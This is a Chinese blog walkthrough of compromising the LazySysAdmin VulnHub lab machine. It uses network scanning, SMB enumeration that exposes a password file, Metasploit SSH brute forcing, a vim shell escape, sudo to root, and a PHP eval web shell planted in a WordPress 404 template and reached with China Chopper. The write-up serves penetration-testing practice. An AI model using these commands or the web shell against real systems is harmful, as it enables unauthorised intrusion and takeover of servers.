靶机渗透【lazysysadmin】

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量6.3k 收藏 40
点赞数 6
分类专栏: 靶机渗透 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52576844/article/details/122435265
版权

文章目录

一. lazysysadmin靶机安装

1. 下载靶机

  • 百度网盘链接提取码

lazysysadmin.zip
提取码:m02v

2. 打开靶机

  • 打开 VMware,在左上角选择 - - 文件 - - 打开
    在这里插入图片描述

  • 找到 lazysysadmin 靶机解压位置
    在这里插入图片描述

  • 开启后如图所示
    在这里插入图片描述

二. lazysysadmin靶机渗透

  • 开启一台 Kali
    Kali(IP):192.168.110.151

若未安装 Kali 可点击此处进行安装
虚拟机安装【Kali】(2018/2021)

1. 信息收集

1)扫描IP

arp-scan -l

发现目标 IP:192.168.110.153
在这里插入图片描述
2)扫描端口

masscan --rate=10000 --ports 0-65535 192.168.110.153

发现目标开启 139,6667,3306,22,80,445 端口
在这里插入图片描述
3)扫描服务

nmap -T4 -sV -O -p 139,6667,3306,22,80,445 192.168.110.153

发现目标开启 ssh,http,共享,mysql 等服务
在这里插入图片描述
4)扫描域名目录

dirb http://192.168.110.153

发现以下有用信息:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

经过信息收集后,我们有大致四种思路:Web,共享服务,ssh服务,数据库
以下将从不同思路切入渗透

2. Web渗透

拿到网站目录后,我们进行一一查看登录

1)http://192.168.110.153

浏览后发现没有可用信息
在这里插入图片描述
2)http://192.168.110.153/info.php

发现PHP配置文件
在这里插入图片描述
3)http://192.168.110.153/phpmyadmin/

发现数据库登录窗口
在这里插入图片描述
4)http://192.168.110.153/robots.txt

这是一个反爬虫网页,一一访问并无收获
在这里插入图片描述
5)http://192.168.110.153/wordpress/
在这里插入图片描述
发现疑似用户名信息
在这里插入图片描述
点击 Hello world! 字样来到如下界面,观察网址
在这里插入图片描述

6)http://192.168.110.153/wordpress/wp-admin/

进入后台登录点
在这里插入图片描述

  • 尝试使用弱口令登录

在这里插入图片描述

  • 利用之前发现的 togie 信息作为用户名再次尝试

在这里插入图片描述

虽然都登录失败,但结合两次对比,我们发现用户名为 togie 时,显示无效用户名,但用户名为 admin 时,显示不正确,不难猜出,admin 可能为其一用户名,发现了用户名枚举漏洞

7)http://192.168.110.153/wordpress/wp-includes/

发现一个目录页面
在这里插入图片描述

在 Web 渗透中,我们发现还是缺乏部分信息,暂时切换思路

3. 共享服务

enum4linux介绍

  • enum.exe的Linux替代软件,用于枚举Windows和Samba主机中的数据
  • 主要特性:
    RID循环(当Windows 2000上的RestrictAnonymous设置为1时)
    用户列表(当Windows 2000上的RestrictAnonymous设置为0时)
    组成员信息列表
    共享枚举
    检测主机是否在工作组或域中
    识别远程操作系统
    密码策略检索(使用polenum)

1)打开新终端

enum4linux 192.168.110.153
在这里插入图片描述
在这里插入图片描述

  • 发现共享登录为空用户名密码,找到共享路径

在这里插入图片描述
2)使用网络远程挂载

mount -t cifs -o username=' ',password=' ' //192.168.110.153/share$ /media
在这里插入图片描述
3)进入挂载位置查看

cd /media
ls
cat deets.txt
在这里插入图片描述

  • 发现初始备用密码:12345

4. ssh服务

1)准备暴力破解的用户名密码字典

vim user.txt /usr/share/wordlists/dirb

在这里插入图片描述
vim pass.txt /usr/share/wordlists/dirb
在这里插入图片描述
2)进入漏洞库

msfconsole
在这里插入图片描述
3)搜索 ssh 登录

search ssh_login
在这里插入图片描述
4)拿下路径,暴力破解

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.110.153
set user_file /usr/share/wordlists/dirb/user.txt
set pass_file /usr/share/wordlists/dirb/pass.txt
set verbose true
run
在这里插入图片描述
5)破解成功

togie 12345
在这里插入图片描述
6)连接 ssh

ssh togie@192.168.110.153
12345
在这里插入图片描述
7)查看信息

cat /etc/issue
cd /tmp
在这里插入图片描述

这时我们发现切换目录收到限制,使用 vim 编译器重新打开一个终端

vim
:set shell=/bin/bash
回车
:shell

发现新开启一行终端

cd /tmp
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
groups
在这里插入图片描述
发现用户拥有 sudo 权限
在这里插入图片描述

sudo su root

使用先前发现的备用密码

12345
在这里插入图片描述

5. 文件上传

回到 /media 终端窗口,查看 wordpress 配置文件

cd wordpress
ls
cat wp-config.php
在这里插入图片描述

发现数据库用户名密码,与我们先前猜想一致

在这里插入图片描述

返回数据库,登录

http://192.168.110.153/phpmyadmin/
在这里插入图片描述
在这里插入图片描述

尝试查看数据库信息,可惜没有读取权限

在这里插入图片描述

想到之前在后台测试点发现的用户名枚举漏洞,用户名正好为 Admin,故尝试相同密码登录后台,发现登录成功

http://192.168.110.153/wordpress/wp-admin/
在这里插入图片描述
在这里插入图片描述

寻找信息,在编辑一栏中发现了 404 页面源码,因为 404 页面较隐蔽、为 php 且不确定其他页面路径,所以我们在 404 页面上传一句话木马

在这里插入图片描述
<?php @eval($_POST[cmd]);?>
在这里插入图片描述
在这里插入图片描述

接下来只需触发 404 页面即可,在 wordpress 前端界面任意跟链接,找到先前发现的?p=1网页

在这里插入图片描述
成功触发 404 页面,意味着木马上传成功
在这里插入图片描述

打开中国菜刀工具,进行连接

右键 - 添加 - 复制网址 - 如图选择 - 添加
在这里插入图片描述
在这里插入图片描述
成功连接
在这里插入图片描述

‍‍‪‍pinkward
关注
  • 6
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 9
    评论
专栏目录
打靶练习之--LazysysAdmin靶机
qq_34094920的博客
12-12 1033
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
Lazysysadmin靶机练习
weixin_71090536的博客
09-02 208
下方实操过程中应用到两台机器,分别是Kali 攻击机:192.168.2.130lazysysadmin靶机:192.168.2.201ps:此靶机的难度系数不算大,掌握方法即可。
VulnHub靶机 DC-9 靶机 详细渗透过程
最新发布
rumil的博客
04-27 1404
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2903
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6000
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
Lazysysadmin靶机渗透过程
0of_blog
04-28 868
提示更新成功,接下来访问hello.php文件,位置:/wordpress/wp-content/plugins/hello.php。查看用户看到了togie账号,结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件。首先去查看WP的配置文件,一般里面会有连接数据库的密码。猜测这是这位的账号密码,刚好开着ssh账号,试着登录。已有sudo权限,至此,对靶机渗透结束。有phpmyadmin,但不知道密码。列出分享目录的列表,没有密码,直接回车。
VulnHub渗透测试实战靶场 - LAZYSYSADMIN: 1
LYJ20010728的博客
08-06 1219
VulnHub渗透测试实战靶场 - LAZYSYSADMIN: 1环境下载LAZYSYSADMIN: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell补充:绕过蚁剑等工具无法使用下getshell提权 环境下载 戳此进行环境下载 LAZYSYSADMIN: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-on
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Lazysysadmin 靶场.zip
12-22
Lazysysadmin 靶场.zip
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
kali渗透综合靶机Lazysysadmin
锋刃科技的博客
06-16 611
0x01靶机环境下载 Lazysysadmin靶机百度云下载 链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ 提取码:q6zo 0x02Lazysysadmin靶机搭建 直接在VMware打开即可 文件->打开->Lazysysadmin.ovf 0x03 渗透测试 主机发现 netdiscover -i eth0 -r 192.168.20.0/24 或 netdiscover -i eth0 -r 192.168...
Vulnhub靶场渗透练习(五) Lazysysadmin
weixin_30379973的博客
07-08 221
第一步扫描ip nmap 192.168.18.* 获取ip 192.168.18.147 扫描端口 root@kali:~# masscan 192.168.18.147 -p 1-10000 --rate=1000 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-07-08 11:54:11 GMT...
OWASP_VM_1.2靶机的下载与安装
热门推荐
冠霖L的博客
07-04 3万+
OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等。它是由一家非营利性组织——OWASP 基金会提供持续性支持,可免费下载与使用。 OWASP官网:https://www.owasp.org OWASP中国官网:http:...
靶机渗透测试(Quaoar)
@小张小张的博客
09-10 2267
靶机渗透测试(Quaoar): Vulnhub靶机 Quaoar 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(初级) 目标:成功渗透进入靶机,找到三项flag,并拿到root权限。 渗透流程: 1.探测主机ip(此靶机开机时已经给出) 2.nmap进行靶机端口服务扫描 3.根据端口服务进行渗透 22-ssh端口:(msf攻击) 可以通过kali虚拟机msf工具进行ssh_login,但由于密码本的数据容量过小,无法爆破出登陆用户与密码;
渗透测试中smb服务(139、445端口)枚举汇总
网络安全领域优质创作者
04-15 3049
本文仅列出相关工具及常见用法,具体使用工具使用教程及命令请自行学习。 按照工具分类列出以下十一种枚举方式: 一、enum enum -s <目标ip> enum -U <目标ip> enum -P <目标ip> 二、enum4linux enum4linux -n <目标ip> enum4linux -a <目标ip&gt...
Linux版SMB远程代码执行漏洞(CVE-2017-7494)-SambaCry 分析报告
counsellor的专栏
05-31 7543
背景2017年5月24日Samba官方发布了安全公告,在Samba 3.5.0 以后的版本中存在严重的代码执行漏洞(CVE-2017-7494)。在rpc_server/srv_pipe.c中的存在一个验证BUG,攻击者可以利用客户端上传恶意动态库文件到具有可写权限的共享目录中,之后发出请求,使服务器加载Samba运行目录以外的非法模块,导致恶意代码执行。漏洞公告=========== Descr
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

‍‍‪‍pinkward

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值